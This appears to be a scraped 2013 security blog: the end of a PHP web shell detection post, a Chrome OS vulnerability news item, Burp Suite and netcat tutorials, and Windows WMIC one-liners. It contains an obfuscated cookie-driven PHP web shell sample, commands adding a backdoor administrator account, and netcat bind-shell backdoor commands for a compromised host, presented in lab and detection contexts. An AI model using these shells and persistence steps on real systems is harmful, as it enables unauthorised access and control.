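STEALTH_SHELL_PHP = """<?php
$p = $_COOKIE['a'] . $_COOKIE['b'];
$d = str_replace('x', '', 'bxasxe64_dxecxode');
eval($d($p));
"""

if __name__ == "__main__":
    for name, verdict in scan_files({"index.php": BENIGN_PHP, "weevely.php": STEALTH_SHELL_PHP}).items():
        print(f"{name}: {verdict}")
```

Note that the decoder pattern deliberately misses the stealth sample: the literal base64_decode never appears there. What gives it away is the combination of eval() with a variable used as a function name, which legitimate application code almost never needs. Pair this with web server log review (POSTs or cookie-bearing requests to a file in an uploads directory) for a second signal.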

thank you.

Tuesday, April 16, 2013

Google Fixes Three High-Risk Flaws in Chrome OS

Google has fixed a series of serious vulnerabilities in its Chrome OS, including three high-risk bugs that could be used for code execution on vulnerable machines. As part of its reward program, Google paid out more than $30,000 to a researcher who found three of the vulnerabilities.

All of the vulnerabilities that Google fixed in Chrome OS are in the O3D plugin, an API that enables developers to create 3D applications for the Web. Three of the vulnerabilities are high-risk and the other flaw is rated a medium severity bug.

Here are the vulnerabilities that Google fixed in Chrome OS 26:

[227197] Medium CVE-2013-2832: Uninitialized memory left in buffer in O3D plug-in. Credit to Ralf-Philipp Weinmann.

[227181] High CVE-2013-2833: Use-after-free in O3D plug-in. Credit to Ralf-Philipp Weinmann.

[227158] High CVE-2013-2834: Origin lock bypass of O3D and Google Talk plug-ins. Credit to Ralf-Philipp Weinmann.

[196456] High CVE-2013-2835: Origin lock bypass of O3D and Google Talk plug-ins. Credit to Google Chrome Security Team (Chris Evans).

Ralf-Philipp Weinmann, the researcher who discovered three of the flaws, received $31,336 in bug bounties for his work. That's at the highest end of the rewards that Google pays out in its Chromium reward program. Most of the rewards are in the $1,000-$3,000 range, with some going above that, depending upon the severity of the vulnerability and difficulty of exploitation.

"We’re pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up. We are grateful to Ralf for his work to help keep our users safe," Ben Henry of the Chrome team said in a blog post.

(Taken from Threat Post)

Saturday, April 13, 2013

Burpsuite Tutorial





Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Link to Download: http://portswigger.net/burp/download.html

Burp Suite is available in a free version and a Pro version.

Requirements to run Burp Suite

--Burp Suite is developed in Java, so it requires a JRE, which is freely available on the internet

--Burp Suite itself

The free version of Burp Suite is included in BackTrack and Kali.

Burp acts as a web proxy and allows you to intercept requests and responses, and then modify them before they are sent on to the server or client. This is very handy for attacking web applications. To intercept HTTPS you must install Burp's CA certificate in the browser; otherwise the browser rejects the per-site certificates Burp generates.

Burp Suite is made up of the following tools (descriptions taken from the PortSwigger website):

Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.

Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Intruder: Burp Intruder is a tool for automating customised attacks against web applications.

Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.

Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.

Comparer: Burp Comparer is a simple tool for performing a comparison (a visual “diff”) between any two items of data. In the context of attacking a web application, this requirement will typically arise when you want to quickly identify the differences between two application responses (for example, between two responses received in the course of a Burp Intruder attack, or between responses to a failed login using valid and invalid usernames), or between two application requests (for example, to identify the different request parameters that give rise to different behaviour).
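To make the Sequencer description concrete, here is an added Python example (not Burp's code) of the two most basic checks it performs on a sample of tokens: per-position character entropy and a test for sequential values. The token sets are constructed; the "random" set uses a seeded generator only so that the run is reproducible, and real session tokens must come from a cryptographic RNG.

```python
"""Estimate how unpredictable a set of session tokens is, in the spirit of Burp Sequencer.

Added example for this post, not code from Burp or PortSwigger. The token sets are
constructed: a counter-based one and one from a seeded PRNG (seeded for reproducibility).
"""
import math
import random
from collections import Counter
from typing import List, Optional


def per_position_entropy_bits(tokens: List[str]) -> float:
    """Sum over character positions of the Shannon entropy of the symbols seen there.

    This is an upper bound on the real entropy: positions are treated as independent
    and each position's estimate is capped by log2(len(tokens)).
    """
    if not tokens:
        return 0.0
    width, n = min(len(t) for t in tokens), len(tokens)
    total = 0.0
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total -= sum(c / n * math.log2(c / n) for c in counts.values())
    return total


def sequential_fraction(tokens: List[str]) -> Optional[float]:
    """Share of consecutive token pairs whose numeric difference equals the most common one.

    Tokens are read as decimal, falling back to hex; 1.0 means a pure counter.
    Returns None when the tokens are not numeric at all.
    """
    values = None
    for base in (10, 16):
        try:
            values = [int(t, base) for t in tokens]
            break
        except ValueError:
            continue
    if values is None or len(values) < 2:
        return None
    diffs = [b - a for a, b in zip(values, values[1:])]
    return Counter(diffs).most_common(1)[0][1] / len(diffs)


def assess(tokens: List[str], min_bits: float = 64.0) -> str:
    """Verdict combining both checks; min_bits is an assumed minimum for a session token."""
    bits = per_position_entropy_bits(tokens)
    seq = sequential_fraction(tokens)
    if seq is not None and seq > 0.5:
        return f"predictable: {seq:.0%} of consecutive tokens differ by a constant"
    if bits < min_bits:
        return f"weak: about {bits:.1f} bits of entropy estimated (want >= {min_bits:.0f})"
    return f"no weakness found: about {bits:.1f} bits estimated"


# Constructed token sets.
COUNTER_TOKENS = [f"{1000 + i:08d}" for i in range(200)]          # e.g. a session counter
_rng = random.Random(2013)                                         # seeded for reproducibility only
RANDOM_TOKENS = ["%032x" % _rng.getrandbits(128) for _ in range(200)]

if __name__ == "__main__":
    for name, tokens in (("counter", COUNTER_TOKENS), ("random", RANDOM_TOKENS)):
        print(f"{name}: {assess(tokens)}")
```

The entropy figure is an upper bound, not a guarantee: a token built from a timestamp can score well on per-position entropy and still be guessable from the clock, which is why Sequencer runs a battery of statistical tests rather than one, and why a reviewer still reads the token generation code when it is available.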

One-liner commands for Windows

Here I will be working mostly with WMIC.

What is WMIC?

Windows Management Instrumentation Command-line. To me, wmic is one of the more powerful commands on Windows: you can do multiple tasks with one command. Note that Microsoft has deprecated WMIC in current Windows versions; the same WMI data is available from PowerShell with Get-CimInstance (for example Get-CimInstance Win32_Process). Also note that defenders watch wmic.exe closely because attackers use it for exactly the enumeration shown here.

List of running processes in brief

wmic process list brief

kill a process

wmic process where name="wordpad.exe" delete

Determine open shares

net share
wmic share list brief

Determine ip address

ipconfig

Get a new ip address

ipconfig /release
ipconfig /renew

Disk drive information

wmic diskdrive list full
wmic partition list full

List all patches

wmic qfe

List services

wmic service list brief

List user accounts

wmic useraccount list brief

List number of times a user logged on

wmic netlogin where (name like "%adm%") get numberoflogons

Reboot

shutdown /r /t 0

Shutdown

shutdown /s /t 0

Spawn a new command prompt

start cmd

Command line history

F7

Determine the current user

echo %USERNAME%

Determine who is apart of the administrators group

net localgroup administrators

Add a user where rocky is the username and redhat is the password

net user rocky redhat /add

Add user rocky to the Administrators group

net localgroup administrators rocky /add

(Both steps need an administrative prompt, and both are classic persistence moves: they produce Security log events 4720, user account created, and 4732, member added to a local group, which are worth alerting on.)

List user accounts

net user

List network connections with the owning process ID (-o) and, from an administrative prompt, the executable that made each connection (-b)

netstat -ano
netstat -anb

Display contents of file text.txt

type text.txt

Edit the contents of file text.txt (edit.com only exists on 32-bit Windows; on 64-bit systems use notepad)

edit text.txt
notepad text.txt

Determine PC name

hostname

Determine whether a system is 32 or 64 bit

wmic cpu get DataWidth /format:list

Startup applications

wmic startup get caption,command

Thursday, April 11, 2013

NETCAT Tutorial





Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Netcat is the TCP/IP "Swiss Army knife".
Netcat was not developed as a backdoor tool, but it is frequently used as one.
Netcat is a simple tool, yet a powerful one: it can do many things.

It can be used as an 

Honeypot
Remote Administration
Chatting Purpose
Port Redirection
Sniffer
Creation of Backdoor
File Transfer and 
Banner Grabbing and many more.

I will be discussing some of the options

LAB:

Windows XP 192.168.142.128
Kali Linux      192.168.142.129

netcat is available by default on most Linux distributions. Kali ships netcat-traditional, the variant that supports the -e option used later; the OpenBSD netcat found on many other distributions does not.

nc (netcat) as a port scanning tool

Now I am scanning the XP machine using nc:

nc -v -w 2 -z <host> <port range>

nc -v -w 2 -z 192.168.142.128 1-1024

-z means scan only (connect and close without sending data), -w 2 sets a 2 second timeout per connection, and -v reports each open port.


nc as a banner grabbing tool

nc -v -n <host> <port>

For example, nc -v -n 192.168.142.128 80 connects to the web server; because HTTP servers wait for a request, type HEAD / HTTP/1.0 and press Enter twice to make the server reveal its Server header. Services such as FTP, SMTP and SSH send their banner as soon as you connect. -n skips DNS resolution.
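For scripting, the same two nc operations (connect-only scan and banner grab) look like this in Python. The example is added here and is not netcat's code; it starts a fake service on localhost with a constructed banner so that it runs without the XP lab machine, and the host and port range can be swapped for the lab values above.

```python
"""A netcat-style TCP connect scan and banner grab, tested against a local fake service.

Added example for this post, not code from the netcat project. The fake service and its
banner are constructed so the example runs offline.
"""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Iterable, List, Optional, Tuple


def is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Equivalent of `nc -z -w <timeout> host port`: connect, then close without sending."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:                      # refused, timed out, unreachable
        return False


def scan(host: str, ports: Iterable[int], timeout: float = 0.5, workers: int = 64) -> List[int]:
    """Return the sorted list of open ports, probing several at a time."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, is_open(host, p, timeout)), ports))
    return sorted(p for p, open_ in results if open_)


def grab_banner(host: str, port: int, probe: Optional[bytes] = None, timeout: float = 2.0) -> bytes:
    """Like `nc -v -n host port`: connect, optionally send a probe, read what the service says.

    SMTP, FTP and SSH talk first; HTTP stays silent until asked, so pass
    probe=b"HEAD / HTTP/1.0\\r\\n\\r\\n" for web servers.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if probe:
            sock.sendall(probe)
        try:
            return sock.recv(1024)
        except socket.timeout:
            return b""


# --- fake service used by the demo (constructed banner) ---
FAKE_BANNER = b"220 lab-xp.example ESMTP ready\r\n"


def start_fake_service(banner: bytes = FAKE_BANNER) -> Tuple[int, Callable[[], None]]:
    """Listen on an ephemeral loopback port, send `banner` to every client; return (port, stop)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    listener.settimeout(0.2)              # lets the accept loop notice the stop flag
    stop_event = threading.Event()

    def serve():
        while not stop_event.is_set():
            try:
                conn, _ = listener.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:           # scanner closed before we could talk; fine
                    pass
        listener.close()

    threading.Thread(target=serve, daemon=True).start()
    return listener.getsockname()[1], stop_event.set


def demo() -> Tuple[int, List[int], bytes]:
    """Start the fake service, scan its port and grab its banner; returns (port, open_ports, banner)."""
    port, stop = start_fake_service()
    try:
        open_ports = scan("127.0.0.1", [port])
        banner = grab_banner("127.0.0.1", port)
    finally:
        stop()
    return port, open_ports, banner


if __name__ == "__main__":
    port, open_ports, banner = demo()
    print(f"open ports: {open_ports}, banner from {port}: {banner!r}")
```

A connect scan completes the TCP handshake, so every probe shows up in the target's logs and in any IDS; that is the price of not needing raw sockets, which a SYN scan (nmap -sS) would require.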


Opening a port and using nc for chatting

nc -lvp 1234

l - listen
v - verbose
p - port number

I am opening port 1234 on the XP machine as the listener.

In the XP machine type the command

nc -lvp 1234

In Kali Linux type the command

nc <host> <port>

nc 192.168.142.128 1234

and you can start chatting: whatever you type on one side appears on the other.


Transferring files using NETCAT

I have a file "hello.txt" on the Windows machine.

XP machine: nc -lvp 1234 < hello.txt

In Kali Linux I receive it into "test.txt":

nc <host> <port> > test.txt

nc 192.168.142.128 1234 > test.txt

The listener sends the file as soon as the client connects. Neither side signals the end of the transfer, so close the connection with Ctrl-C once the file has arrived (or use -q 1 on the sending side with netcat-traditional), and compare a hash of both copies (md5sum on Linux; certutil -hashfile on Windows Vista and later), since netcat provides no integrity check.



Netcat as a backdoor

Suppose we have compromised a system and want a backdoor for remote administration; netcat is very useful for that.

Upload netcat to the remote system and run the following command; it binds a shell to the port, and whoever connects gets a command prompt:

nc -L -p 1234 -d -e cmd.exe

(-L listens again after the client disconnects, -d detaches from the console, -e runs the named program with its input and output connected to the socket; -L and -d are options of the Windows netcat build.)

In the XP machine: nc -lvp 1234 -e cmd.exe

In Kali: nc 192.168.142.128 1234

You will get a command prompt. Keep in mind that this bind shell is unauthenticated and unencrypted: anyone who can reach port 1234 gets the same prompt, and the traffic, including the commands you type, is visible to any sniffer on the path. It also needs an inbound connection, which a firewall in front of the target usually blocks; a reverse shell (the target connects out to your listener) avoids that.



Thank you